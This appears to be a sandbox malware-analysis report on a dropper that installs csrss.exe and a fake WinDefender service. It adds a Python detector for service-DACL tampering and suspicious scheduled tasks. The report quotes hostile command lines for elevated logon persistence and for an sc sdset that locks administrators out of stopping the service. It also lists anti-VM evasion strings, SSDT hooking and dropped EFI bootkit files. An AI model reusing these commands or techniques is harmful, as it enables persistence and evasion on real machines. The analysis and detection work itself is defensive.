Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\sc.exe sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
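The two command lines above are the persistence pair worth alerting on: an elevated logon task that launches C:\Windows\rss\csrss.exe from a non-standard Windows subdirectory, and an sc sdset that rewrites the security descriptor of the WinDefender service. Decoding the SDDL shows why the "Suspicious Service DACL Modification" Sigma rule fires. In the default service DACL the Administrators (BA) allow ACE carries CCDCLCSWRPWPDTLOCRSDRCWDWO; here it has been reduced to CCDCLCSWRPLOCRSDRCWDWO, dropping WP (SERVICE_STOP) and DT (SERVICE_PAUSE_CONTINUE), and an explicit deny ACE (D;;WPDT;;;BA) removes the same two rights, so an administrator can no longer stop or pause the service. The Python below is an added example, not code from the report or from the sample: it parses the SDDL, flags the lock-out, and applies a simple heuristic to the schtasks line. The sample command lines are constructed from this report plus one benign sc sdset line, and the "trusted Windows directory" list is an assumption of the example.

```python
import re
from dataclasses import dataclass

# SDDL service-specific access rights (two-letter tokens -> SERVICE_* constant).
SERVICE_RIGHTS = {
    "CC": "SERVICE_QUERY_CONFIG", "DC": "SERVICE_CHANGE_CONFIG",
    "LC": "SERVICE_QUERY_STATUS", "SW": "SERVICE_ENUMERATE_DEPENDENTS",
    "RP": "SERVICE_START", "WP": "SERVICE_STOP", "DT": "SERVICE_PAUSE_CONTINUE",
    "LO": "SERVICE_INTERROGATE", "CR": "SERVICE_USER_DEFINED_CONTROL",
    "SD": "DELETE", "RC": "READ_CONTROL", "WD": "WRITE_DAC", "WO": "WRITE_OWNER",
    "GA": "GENERIC_ALL", "GR": "GENERIC_READ", "GW": "GENERIC_WRITE",
    "GX": "GENERIC_EXECUTE",
}
# Rights an operator needs to stop, reconfigure or delete a service.
CONTROL_RIGHTS = {"WP", "DT", "DC", "SD", "WD", "WO"}
PRIVILEGED_TRUSTEES = {"BA", "SY"}  # Builtin Administrators, Local System
# Assumption for the schtasks heuristic: an elevated logon task whose target lives
# under C:\Windows but outside these directories is suspicious.
TRUSTED_WINDOWS_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")


@dataclass(frozen=True)
class Ace:
    ace_type: str       # "A" allow, "D" deny, "AU" audit
    rights: frozenset   # two-letter SDDL right tokens (or one raw 0x... mask)
    trustee: str        # SDDL SID alias (BA, SY, IU, SU, WD, ...) or full SID


def parse_sddl(sddl: str) -> dict:
    """Return {"D": [Ace, ...], "S": [Ace, ...]} for the DACL and SACL of an SDDL string."""
    acls = {"D": [], "S": []}
    for key in acls:
        # "D:" or "S:" may be followed by ACL flags (P, AI, AR) before the first ACE.
        section = re.search(key + r":[A-Z]*((?:\([^)]*\))*)", sddl)
        if not section:
            continue
        for ace in re.findall(r"\(([^)]*)\)", section.group(1)):
            fields = ace.split(";")   # type;flags;rights;object_guid;inherit_guid;sid
            if len(fields) < 6:
                continue
            rights = fields[2]
            if rights.lower().startswith("0x"):
                tokens = frozenset([rights])
            else:
                tokens = frozenset(rights[i:i + 2] for i in range(0, len(rights), 2))
            acls[key].append(Ace(fields[0], tokens, fields[5]))
    return acls


def service_dacl_findings(sddl: str) -> list:
    """Flag a service DACL that locks administrators or SYSTEM out of controlling it."""
    findings = []
    dacl = parse_sddl(sddl)["D"]
    for ace in dacl:
        if ace.ace_type == "D" and ace.trustee in PRIVILEGED_TRUSTEES:
            stripped = sorted(SERVICE_RIGHTS.get(r, r) for r in ace.rights & CONTROL_RIGHTS)
            if stripped:
                findings.append(f"deny ACE for {ace.trustee} removes {', '.join(stripped)}")
    for ace in dacl:
        if (ace.ace_type == "A" and ace.trustee == "BA"
                and not ace.rights & {"WP", "GA"}):
            findings.append("allow ACE for BA lacks SERVICE_STOP")
    return findings


SC_SDSET_RE = re.compile(r"\bsc(?:\.exe)?\s+sdset\s+(\S+)\s+(\S+)", re.IGNORECASE)
SCHTASKS_RE = re.compile(r"\bschtasks(?:\.exe)?\s+/create\b", re.IGNORECASE)


def analyze_command(cmdline: str) -> list:
    """Return findings for one process-creation command line."""
    findings = []
    m = SC_SDSET_RE.search(cmdline)
    if m:
        service, sddl = m.groups()
        findings += [f"sc sdset {service}: {f}" for f in service_dacl_findings(sddl)]
    if SCHTASKS_RE.search(cmdline):
        target = re.search(r'/tr\s+"?([^"]+?)"?(?:\s+/|$)', cmdline, re.IGNORECASE)
        elevated = re.search(r"/rl\s+highest", cmdline, re.IGNORECASE)
        on_logon = re.search(r"/sc\s+onlogon", cmdline, re.IGNORECASE)
        if target and elevated and on_logon:
            path = target.group(1).strip()
            low = path.lower()
            if low.startswith("c:\\windows\\") and not low.startswith(TRUSTED_WINDOWS_DIRS):
                findings.append(f"schtasks: elevated logon task runs {path} "
                                "from a non-standard Windows subdirectory")
    return findings


# Constructed sample: the two command lines from this report plus one benign
# sc sdset that applies a stock-looking DACL (admins keep WP/DT, no deny ACE).
SAMPLE_COMMANDS = [
    'schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\\Windows\\rss\\csrss.exe" /TN csrss /F',
    "sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)"
    "(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)"
    "S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)",
    "sc sdset Spooler D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
    "(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)",
]

if __name__ == "__main__":
    for cmd in SAMPLE_COMMANDS:
        for finding in analyze_command(cmd) or ["no finding"]:
            print(f"{cmd[:40]}...: {finding}")
```

The deny ACE is the stronger signal: Windows evaluates deny ACEs before allow ACEs, so even an administrator who re-adds WP to the allow ACE stays locked out until the deny ACE is removed (sc sdset with a clean descriptor, run as SYSTEM, which the DACL still permits).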

Hooking and other Techniques for Hiding and Protection:

May modify the system service descriptor table (often done to hook functions)
Source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp Binary or memory string: KeServiceDescriptorTable
Source: upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp Binary or memory string: KeServiceDescriptorTable
Source: csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp Binary or memory string: KeServiceDescriptorTable
Source: C:\Users\user\Desktop\0NlSa5bf55.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\0NlSa5bf55.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\upd.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\upd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\upd.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\upd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\rss\csrss.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\rss\csrss.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX (reported for five conhost.exe instances)
Source: C:\Windows\windefender.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\windefender.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\windefender.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\windefender.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp Binary or memory string: TOO MANY LINKSTOO MANY USERSUNEXPECTED EOFUNKNOWN CODE: UNKNOWN ERROR UNKNOWN MARKERUNKNOWN METHODUNKNOWN MODE: UNREACHABLE: UNSAFE.POINTERVIRTUALBOX: %WVMWARETRAY.EXEVMWAREUSER.EXEWII LIBNUP/1.0WINAPI ERROR #WORK.FULL != 0X509IGNORECN=1XENSERVICE.EXEZERO PARAMETER WITH GC PROG
Source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp Binary or memory string: ... OMITTING ACCEPT-CHARSETAFTER EFIGUARDALLOCFREETRACEBAD RST MARKERBAD ALLOCCOUNTBAD RECORD MACBAD SPAN STATEBAD STACK SIZEBTC.USEBSV.COMCERT INSTALLEDCHECKSUM ERRORCONTENT-LENGTHCOULDN'T PATCHDATA TRUNCATEDDISTRIBUTOR_IDDRIVER REMOVEDEXIT STATUS -1FILE TOO LARGEFINALIZER WAITGCSTOPTHEWORLDGETPROTOBYNAMEGOT SYSTEM PIDINITIAL SERVERINTERNAL ERRORINVALID SYNTAXIS A DIRECTORYKEY SIZE WRONGLEVEL 2 HALTEDLEVEL 3 HALTEDLOOKUP TXT: %WMEMPROFILERATENEED MORE DATANIL ELEM TYPE!NO MODULE DATANO SUCH DEVICEPARSE CERT: %WPROTOCOL ERRORREAD CERTS: %WREPORT_ID IS 0RUNTIME: BASE=RUNTIME: FULL=S.ALLOCCOUNT= SEMAROOT QUEUESERVER.VERSIONSTACK OVERFLOWSTOPM SPINNINGSTORE64 FAILEDSYNC.COND.WAITTEXT FILE BUSYTIMEENDPERIODTOO MANY LINKSTOO MANY USERSUNEXPECTED EOFUNKNOWN CODE: UNKNOWN ERROR UNKNOWN MARKERUNKNOWN METHODUNKNOWN MODE: UNREACHABLE: UNSAFE.POINTERVIRTUALBOX: %WVMWARETRAY.EXEVMWAREUSER.EXEWII LIBNUP/1.0WINAPI ERROR #WORK.FULL != 0X509IGNORECN=1XENSERVICE.EXEZERO PARAMETER WITH GC PROG
Source: upd.exe, csrss.exe Binary or memory string: RTP.EXESYSTEMROOT=SETFILETIMESIGNWRITINGSOFT_DOTTEDSYSTEMDRIVETESTING KEYTTL EXPIREDVBOXSERVICEVMUSRVC.EXEVT_RESERVEDVARIANTINITVIRTUALFREEVIRTUALLOCKWSARECVFROMWARANG_CITIWHITE_SPACEWINDEFENDER[:^XDIGIT:]\DSEFIX.EXEALARM CLOCKAPPLICATIONBAD ADDRESSBAD MESSAGE
Source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp Binary or memory string: RTP.EXESYSTEMROOT=SETFILETIMESIGNWRITINGSOFT_DOTTEDSYSTEMDRIVETESTING KEYTTL EXPIREDVBOXSERVICEVMUSRVC.EXEVT_RESERVEDVARIANTINITVIRTUALFREEVIRTUALLOCKWSARECVFROMWARANG_CITIWHITE_SPACEWINDEFENDER[:^XDIGIT:]\DSEFIX.EXEALARM CLOCKAPPLICATIONBAD ADDRESSBAD MESSAGEBAD TIMEDIVBITCOINS.SKBROKEN PIPECAMPAIGN_IDCGOCALL NILCLOBBERFREECLOSESOCKETCOMBASE.DLLCOMPAIGN_IDCREATED BY CRYPT32.DLLDNSMESSAGE.E2.KEFF.ORGEMBEDDED/%SFILE EXISTSFINAL TOKENFLOAT32NAN2FLOAT64NAN2FLOAT64NAN3GCCHECKMARKGENERALIZEDGET CDN: %WGETPEERNAMEGETSOCKNAMEHTTPS_PROXYI/O TIMEOUTLOCAL ERRORLOST MCACHEMSPANMANUALMETHODARGS(MSWSOCK.DLLNEXT SERVERNIL CONTEXTORANNIS.COMPARSE ERRORPROCESS: %SRAW-CONTROLREFLECT.SETRETRY-AFTERRUNTIME: P RUNTIME: P SCHEDDETAILSECHOST.DLLSECUR32.DLLSERVICE: %SSHELL32.DLLSHORT WRITETASKMGR.EXETLS: ALERT(TRACEALLOC(TRAFFIC UPDUNREACHABLEUSERENV.DLLVERSION=183WININET.DLLWUP_PROCESS (SENSITIVE) [RECOVERED] ALLOCCOUNT FOUND AT *( GCSCANDONE M->GSIGNAL= MINTRIGGER= NDATAROOTS= NSPANROOTS= PAGES/BYTE
Source: upd.exe, csrss.exe Binary or memory string: TOO MANY LINKSTOO MANY USERSUNEXPECTED EOFUNKNOWN CODE: UNKNOWN ERROR UNKNOWN MARKERUNKNOWN METHODUNKNOWN MODE: UNREACHABLE: UNSAFE.POINTERVIRTUALBOX: %WVMWARETRAY.EXEVMWAREUSER.EXEWII LIBNUP/1.0WINAPI ERROR #WORK.FULL != 0X509IGNORECN=1XENSERVICE.EXEZERO PAR
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\svchost.exe TID: 6648 Thread sleep time: -240000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe TID: 752 Thread sleep time: -59000s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed (reported for seven conhost.exe instances)
Found dropped PE file which has not been started or loaded
Source: C:\Windows\rss\csrss.exe Dropped PE file which has not been started: B:\EFI\Boot\old.efi (copy)
Source: C:\Windows\rss\csrss.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
Source: C:\Windows\rss\csrss.exe Dropped PE file which has not been started: C:\EFI\Boot\EfiGuardDxe.efi
Source: C:\Windows\rss\csrss.exe Dropped PE file which has not been started: C:\EFI\Boot\bootx64.efi
Source: C:\Windows\rss\csrss.exe Dropped PE file which has not been started: C:\EFI\Microsoft\Boot\bootmgfw.efi
Source: C:\Windows\rss\csrss.exe Dropped PE file which has not been started: B:\EFI\Microsoft\Boot\fw.efi (copy)
(the .efi images are run by the firmware at the next boot, not by a Windows process, so a sandbox run cannot observe them starting; the drop itself is the finding)
Is looking for software installed on the system
Source: C:\Windows\rss\csrss.exe Registry key enumerated: More than 173 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Users\user\Desktop\upd.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
Source: C:\Users\user\Desktop\upd.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
Source: C:\Users\user\Desktop\upd.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
Source: C:\Windows\rss\csrss.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
Source: C:\Windows\windefender.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
Source: C:\Users\user\Desktop\upd.exe Process information queried: ProcessInformation
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Code function: 36_2_00007FF7019D5C10 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,FindClose, 36_2_00007FF7019D5C10
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Hypervisor-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 74a95330c532692c7cf7a70ce16db670, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:57:09, Info CBS Appl: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Tools-All, Applicable: NeedsParent, Disposition: Staged
Source: csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp Binary or memory string: too many linkstoo many usersunexpected EOFunknown code: unknown error unknown markerunknown methodunknown mode: unreachable: unsafe.Pointervirtualbox: %wvmwaretray.exevmwareuser.exewii libnup/1.0winapi error #work.full != 0x509ignoreCN=1xenservice.exezero parameter with GC prog
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Evaluating package applicability for package Microsoft-Hyper-V-Online-Services-Package~31bf3856ad364e35~amd64~~10.0.17134.1, applicable state: Installed
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Online-Services-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:57:09, Info CBS Appl: DetectUpdate, Package: Microsoft-Windows-PAW-Feature-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Remote Parent: Microsoft-Hyper-V, Intended State: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Package-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 962ff8519dbe320490c8b5e46ae96eb5, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
Source: csrss.exe Binary or memory string: rinvalid locationloopbackmac_addrmountainmountvolmsvmmoufnamelessno anodeno-cacheno_proxyopPseudopolishedraw-readreadfromrecvfromrestlessrunnableruntime.scavengeshutdownsolitarystrconv.taskkilltwilightunixgramunknown(usernamevmmemctlvmx_svgawitheredwsaioctlwua
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:57, Info CBS Update: Setting Install State, Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Hypervisor, current State: Default, new state: Off, RemovePayload: 0
Source: csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp Binary or memory string: (MISSING)(unknown)+infinity, newval=, oldval=-07:00:00-infinity/api/cdn?/api/poll244140625: status=; Domain=Accuracy(AuthorityBassa_VahBhaiksukiClassINETCuneiformDiacriticExecQueryFindCloseForbiddenGetDIBitsHex_DigitInheritedInstMatchInstRune1InterfaceKhudawadiLocalFreeMalayalamMongolianMoveFileWNabataeanNot FoundOP_RETURNOSCaptionPalmyreneParseUintPatchTimePublisherReleaseDCRemoveAllSamaritanSee OtherSeptemberSundaneseSysnativeToo EarlyTrailer: TypeCNAMETypeHINFOTypeMINFOUse ProxyVBoxGuestVBoxMouseWSASendToWednesdayWindows 7WriteFileZ07:00:00[%v = %d][:^word:][:alnum:][:alpha:][:ascii:][:blank:][:cntrl:][:digit:][:graph:][:lower:][:print:][:punct:][:space:][:upper:]atomicor8b.ooze.ccbad indirbillowingbroadcastbus errorbutterflychallengechan sendcomplex64connectexcopystackcsrss.exectxt != 0d.nx != 0ecdsa.netempty urlfn.48.orgfodhelperfork/execfuncargs(gdi32.dllimage/gifimage/pnginterfaceinterruptipv6-icmplingeringlocalhostmSpanDeadmSpanFreemulticastnew tokennil errorntdll.dllole32.dllomitemptypanicwaitpatch.exepclmulqdqprecisionprintableprotocol psapi.dllraw-writereboot inrecover: reflect: resonancerwxrwxrwxscheduledsmb startsnowflakesparklingsucceededtask %+v
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: a39411adbcba7770488faca4732df809, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Evaluating package applicability for package HyperV-Primitive-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1, applicable state: Installed
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:56:42, Info CBS Appl: DetectUpdate, Package: Microsoft-Windows-PAW-Feature-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Remote Parent: Microsoft-Hyper-V-Hypervisor, Intended State: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Management-Clients-63, current: Staged, pending: Default, start: Staged, applicable: Staged, targeted: Staged, limit: Installed, selected: Default
Source: csrss.exe Binary or memory string: nInUseno resultsnot a boolnot signedowner diedprl_cc.exeres binderres masterresumptionrune <nil>runtime: gschedtracesemacquireset-cookiesetsockoptsocks bindterminatedtracefree(tracegc() unixpacketunknown pcuser-agentuser32.dllvmusbmousevmware: %wwildflowerws2_
Source: csrss.exe Binary or memory string: epslicesmallsmokesnowysockssoundsse41sse42ssse3stilltext/tls13tls: totaluint8usageuser=utf-8valuevmusbvmx86voicewaterwhitewispywriteyoung (MB) Value addr= base code= ctxt: curg= goid jobs= list= m->p= next= p->m= prev= span=%s: %s(...) , not , val -BEFV--DY
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V, Applicable: NeedsParent, Disposition: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Evaluating package applicability for package Microsoft-Hyper-V-Package-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1, applicable state: Installed
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:56:56, Info CBS Exec: Package: Microsoft-Hyper-V-Offline-Common-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1 is already in the correct state, current: Staged, targeted: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Windows-RemoteFX-Graphics-Virtualization-Host, Applicable: NeedsParent, Disposition: Staged
Source: csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp Binary or memory string: VersionVirtualWSARecvWSASend"%s" %stypes value=abortedalt -> ancientany -> booleancharsetchunkedcmd.execonnectconsolecpu: %scrimsonderivedexpiresfallingfeatherfireflyfloat32float64gctraceglitterhttp://id is 0invalidkdu.exelookup max-agemorningnil keynop -> number panic: patientrefererrefreshrunningserial:server=signal silencesvc_versyscallthundertraileruintptrunknownupgradeversionvmmousevpcuhubwaitingwsarecvwsasendwup_verxen: %wxennet6 data=%q etypes goal
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Offline-Core-Group-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: d3310f7470f5cc3e99866abe683b453d, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Evaluating package applicability for package Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, applicable state: Installed
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:56:42, Info CBS Appl: DetectUpdate, Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Local Parent: Microsoft-Hyper-V-All, Intended State: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:57, Info CBS Update: Setting Install State, Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Services, new state: Off
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Merge into existing execution package for Package: Microsoft-Hyper-V-Hypervisor-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1, existing TargetedState: Staged, new TargetedState: Staged
Source: csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp Binary or memory string: , not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--PFQJ--PLND--RTMD--VRSM--XQVL-.onion/%d-%d/%d-%s/31340370000390625:31461<-chanAcceptAnswerArabicAugustBasic BitBltBrahmiCANCELCarianChakmaClass(CommonCookieCopticDELETEExpectFltMgrFormatFridayGOAWAYGOROOTGetACPGothicHangulHatranHebrewHyphenKaithiKhojkiLepchaLockedLycianLydianMondayPADDEDPcaSvcPragmaProgidRejangSCHED STREETServerStringSundaySyriacTai_LeTangutTeluguThaanaTypeMXTypeNSUTC+12UTC+13UTC-02UTC-08UTC-09UTC-11VBoxSFVT(%d)WINDIRWinMonWinmon[]byte\??\%s\csrss\ufffd
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Primitive-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: de764c40154bbe38bec34936ef639ab9, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:56:56, Info CBS Exec: Package: HyperV-Primitive-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1 is already in the correct state, current: Staged, targeted: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Compute-System-VirtualMachine-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 2679350ec0edae52ee03c1daaf55d8c2, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Offline-Common-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 878b2f9862ce158a90aa7b5c871b772e, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Evaluating package applicability for package Microsoft-Hyper-V-Offline-Common-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1, applicable state: Installed
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:57, Info CBS Update: Setting Install State, Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V, new state: Off
Source: csrss.exe Binary or memory string: ikiPRIORITYParseIntPersoconPhags_PaQuestionReadFileReceivedSETTINGSSHA1-RSASaturdaySetEventSystem32TagbanwaTai_ThamTai_VietThursdayTifinaghTypeAAAATypeAXFRUgariticVBoxWddmVT_ARRAYVT_BYREFWSAIoctlWinmonFS[:word:][signal \\.\HGFS\\.\vmcistack=[_NewEnumacceptexa
Source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp Binary or memory string: to unallocated span%%!%c(*big.Float=%s)%s\Sysnative\cmd.exe37252902984619140625Arabic Standard TimeAzores Standard TimeCertFindChainInStoreCertOpenSystemStoreWChangeServiceConfigWCheckTokenMembershipCreateProcessAsUserWCryptAcquireContextWDHT has wrong lengthDQT has wrong lengthDRI has wrong lengthEgyptian_HieroglyphsEnumProcessModulesExFileTimeToSystemTimeGetAcceptExSockaddrsGetAdaptersAddressesGetCurrentDirectoryWGetFileAttributesExWGetModuleFileNameExWGetModuleInformationGetProcessMemoryInfoGetWindowsDirectoryWIDS_Trinary_OperatorInsufficient StorageIsrael Standard TimeJordan Standard TimeMAX_HEADER_LIST_SIZEMalformed JSON errorMediapartners-GoogleMeroitic_HieroglyphsNtUnmapViewOfSectionNtWriteVirtualMemoryOffline Explorer/2.5ProcessIdToSessionIdQueryServiceConfig2WQueryServiceStatusExRegisterEventSourceWRequest URI Too LongRtlInitUnicodeStringSHGetKnownFolderPathSOF has wrong lengthSOS has wrong lengthSafeArrayDestroyDataSafeArrayGetElemsizeSeek: invalid offsetSeek: invalid whenceSetCurrentDirectoryWSetHandleInformationSetVolumeMountPointWTaipei Standard TimeTerminal_PunctuationTurkey Standard TimeUnprocessable EntityWinmonProcessMonitor[invalid char class]\\.\pipe\VBoxTrayIPCasn1: syntax error: bad defer size classbad font file formatbad system page sizebad use of bucket.bpbad use of bucket.mpchan send 